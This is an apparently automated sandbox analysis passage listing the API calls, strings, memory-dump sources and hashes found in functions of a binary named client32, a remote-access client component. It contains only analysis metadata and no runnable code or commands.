Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E

_free.LIBCMT ref: 11140D4C

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2

Function 1100EC70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2

Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006

_free.LIBCMT ref: 1100ECB4

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 1100ECC7
_free.LIBCMT ref: 1100ECDA
_free.LIBCMT ref: 1100ECED

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92

Function 11141F80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 11141FAE
wsprintfA.USER32 ref: 11141FC4

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,77068400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

%sNSM.LIC, xrefs: 11141FA8
NSM.LIC, xrefs: 11141F93
%sNSA.LIC, xrefs: 11141FBE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
API String ID: 3779116287-2600120591
Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95

Function 1113F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,77068400,?), ref: 1113F937
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
CloseHandle.KERNEL32(00000000), ref: 1113F95F

Strings

", xrefs: 1113F8EE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseHandle
String ID: "
API String ID: 1443461169-123907689
Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752

Function 68C66610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

Part of subcall function 68C79BF0: _strncpy.LIBCMT ref: 68C79C14

inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68C66691
gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68C666A2
WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 68C666CD

Strings

Cannot resolve hostname %s, error %d, xrefs: 68C666D6

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_strncpygethostbynameinet_addr
String ID: Cannot resolve hostname %s, error %d
API String ID: 2603238076-1802540647
Opcode ID: 5e0df75126623f619cd669972de8a1391cfe59fa163362f937a5811ff5f659f7
Instruction ID: 68c90dad0e46caa96cda00a1fd241c4cc11b34cb74867c27fb502a200dcb1c17
Opcode Fuzzy Hash: 5e0df75126623f619cd669972de8a1391cfe59fa163362f937a5811ff5f659f7
Instruction Fuzzy Hash: 7021BA75A401089BDB10DF74DC80FAAB7F8BF48268F8085AAE91AD7280FF30D944C790

Function 1102CD10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,62C07B5E,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7765C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

CreateEventA.KERNEL32 ref: 1102CD8A

Strings

Client, xrefs: 1102CD43
DisableGeolocation, xrefs: 1102CD3E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 2598271332-4166767992
Opcode ID: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
Opcode Fuzzy Hash: a0e31b12da12a7498f8e628daecd04d7d44295960fafd86e3c528dcff422f91c
Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84

Function 11026E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A

Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,7707A1D0,77063760,77067A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34

TranslateMessage.USER32(?), ref: 11026E60
DispatchMessageA.USER32(?), ref: 11026E66

Strings

Exit Msgloop, quit=%d, xrefs: 11026E9D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2

Function 1110C420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1110C454

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

_memset.LIBCMT ref: 1110C477

Strings

Can't alloc %u bytes, xrefs: 1110C44E
..\ctl32\Refcount.cpp, xrefs: 1110C465

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 1322847840-2664294811
Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5

Function 11017610 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1101761D

Part of subcall function 11017520: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101755C
Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Part of subcall function 11017440: WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017472
Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

SetEvent.KERNEL32(00000310), ref: 1101763D
GetTickCount.KERNEL32 ref: 11017643

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleTickUninitializeWait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3357037191-4122679463
Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2

Function 68C65000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68C65014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68C68E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68C65034
SetLastError.KERNEL32(00000078,00000000,?,68C68E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68C6503D

Strings

GetModuleFileNameExA, xrefs: 68C6500E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 4ad1f897bc0131800654e515f95386f902cb37511c1b055dae5e3a769e34e4d7
Instruction ID: b7e9b28423633b6dc2a9e12bc61c56f7fdb81bbd6482e2e8adced24fa4ac3411
Opcode Fuzzy Hash: 4ad1f897bc0131800654e515f95386f902cb37511c1b055dae5e3a769e34e4d7
Instruction Fuzzy Hash: E7F08272600618EFC720CF94E884E5B77B8EB48760F00451AF946D7240D671F854CBF1

Function 68C64FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68C64FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68C68E0D,00000000,?,68C68E0D,00000000,?,00000FA0,?), ref: 68C64FE4
SetLastError.KERNEL32(00000078,00000000,?,68C68E0D,00000000,?,00000FA0,?), ref: 68C64FED

Strings

EnumProcessModules, xrefs: 68C64FBE

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

